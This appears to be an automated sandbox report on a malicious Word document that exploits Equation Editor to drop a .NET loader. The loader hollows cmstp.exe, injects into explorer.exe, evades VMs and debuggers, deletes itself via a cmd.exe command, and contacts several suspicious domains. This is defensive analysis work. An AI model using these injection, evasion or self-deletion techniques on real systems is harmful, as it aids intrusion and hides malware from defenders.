Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe" Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$O-5433ERE.doc Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD883.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@9/9@6/4
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr OLE document summary: edited time not present or 0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: ashlkyvc7592.exe, ashlkyvc7592.exe, 00000005.00000003.424164499.00000000007B0000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000003.425110861.0000000000910000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.462140612.0000000000C20000.00000040.00000001.sdmp, cmstp.exe, cmstp.exe, 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, cmstp.exe, 00000007.00000003.462746039.0000000001E70000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000003.461709967.00000000004F0000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000002.686830161.0000000002180000.00000040.00000001.sdmp
Source: Binary string: cmstp.pdb source: ashlkyvc7592.exe, 00000005.00000002.461894500.00000000006D9000.00000004.00000020.sdmp, ashlkyvc7592.exe, 00000005.00000002.461761536.00000000003E0000.00000040.00020000.sdmp
Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: ashlyzx[1].exe.2.dr, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: ashlkyvc7592.exe.2.dr, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.2.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.ashlkyvc7592.exe.60000.4.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.ashlkyvc7592.exe.60000.3.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.ashlkyvc7592.exe.60000.5.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.ashlkyvc7592.exe.60000.7.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.2.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.ashlkyvc7592.exe.60000.9.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.ashlkyvc7592.exe.60000.2.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.ashlkyvc7592.exe.60000.1.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 4_2_003412DD push esp; retn 002Dh 4_2_00341321
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 4_2_00343652 push esp; retn 002Dh 4_2_00343655
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_0041B87C push eax; ret 5_2_0041B882
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_0041B812 push eax; ret 5_2_0041B818
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_0041B81B push eax; ret 5_2_0041B882
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_004068A0 push es; retf 5_2_004068AF
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_0040697C push esi; ret 5_2_0040697D
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00414406 push B75A778Ch; ret 5_2_0041440B
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_0041CEBD push ebp; retf 5_2_0041CEBE
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_0041B7C5 push eax; ret 5_2_0041B818
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00414FF5 push ecx; ret 5_2_00414FF6
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00415FFA push ecx; iretd 5_2_00416004
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00ABDFA1 push ecx; ret 5_2_00ABDFB4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0201DFA1 push ecx; ret 7_2_0201DFB4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000A4406 push B75A778Ch; ret 7_2_000A440B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000AB7C5 push eax; ret 7_2_000AB818
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000AB81B push eax; ret 7_2_000AB882
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000AB812 push eax; ret 7_2_000AB818
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000AB87C push eax; ret 7_2_000AB882
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000968A0 push es; retf 7_2_000968AF
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000A8913 push ds; retn 4797h 7_2_000A891D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0009697C push esi; ret 7_2_0009697D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000ACEBD push ebp; retf 7_2_000ACEBE
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000A5FFA push ecx; iretd 7_2_000A6004
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000A4FF5 push ecx; ret 7_2_000A4FF6
Source: initial sample Static PE information: section name: .text entropy: 7.66317958598
Source: initial sample Static PE information: section name: .text entropy: 7.66317958598

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ashlyzx[1].exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.425463492.0000000002241000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ashlkyvc7592.exe PID: 1528, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ashlkyvc7592.exe, 00000004.00000002.425463492.0000000002241000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: ashlkyvc7592.exe, 00000004.00000002.425463492.0000000002241000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 0000000000098604 second address: 000000000009860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 000000000009898E second address: 0000000000098994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1184 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe TID: 2672 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe TID: 2988 Thread sleep time: -36000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\cmstp.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_004088C0 rdtsc 5_2_004088C0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000006.00000000.443682934.000000000457A000.00000004.00000001.sdmp Binary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_
Source: explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.443682934.000000000457A000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000c.ex
Source: explorer.exe, 00000006.00000000.511664775.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.433262826.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_004088C0 rdtsc 5_2_004088C0
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AC26F8 mov eax, dword ptr fs:[00000030h] 5_2_00AC26F8
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020226F8 mov eax, dword ptr fs:[00000030h] 7_2_020226F8
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00409B30 LdrLoadDll, 5_2_00409B30
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.texaszephyr.com
Source: C:\Windows\explorer.exe Domain query: www.bandhancustomer.com
Source: C:\Windows\explorer.exe Domain query: www.publicfigure.skin
Source: C:\Windows\explorer.exe Network Connect: 172.67.184.102 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.volunteervabetweenk.com
Source: C:\Windows\explorer.exe Domain query: www.1oavyx.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 110000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Memory written: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Thread register set: target process: 1764 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe" Jump to behavior
Source: explorer.exe, 00000006.00000000.427630812.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447568102.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.511801365.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.439598831.0000000000750000.00000002.00020000.sdmp, cmstp.exe, 00000007.00000002.686590550.0000000000A60000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.427630812.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447568102.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.511801365.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.439598831.0000000000750000.00000002.00020000.sdmp, cmstp.exe, 00000007.00000002.686590550.0000000000A60000.00000002.00020000.sdmp Binary or memory string: !Progman
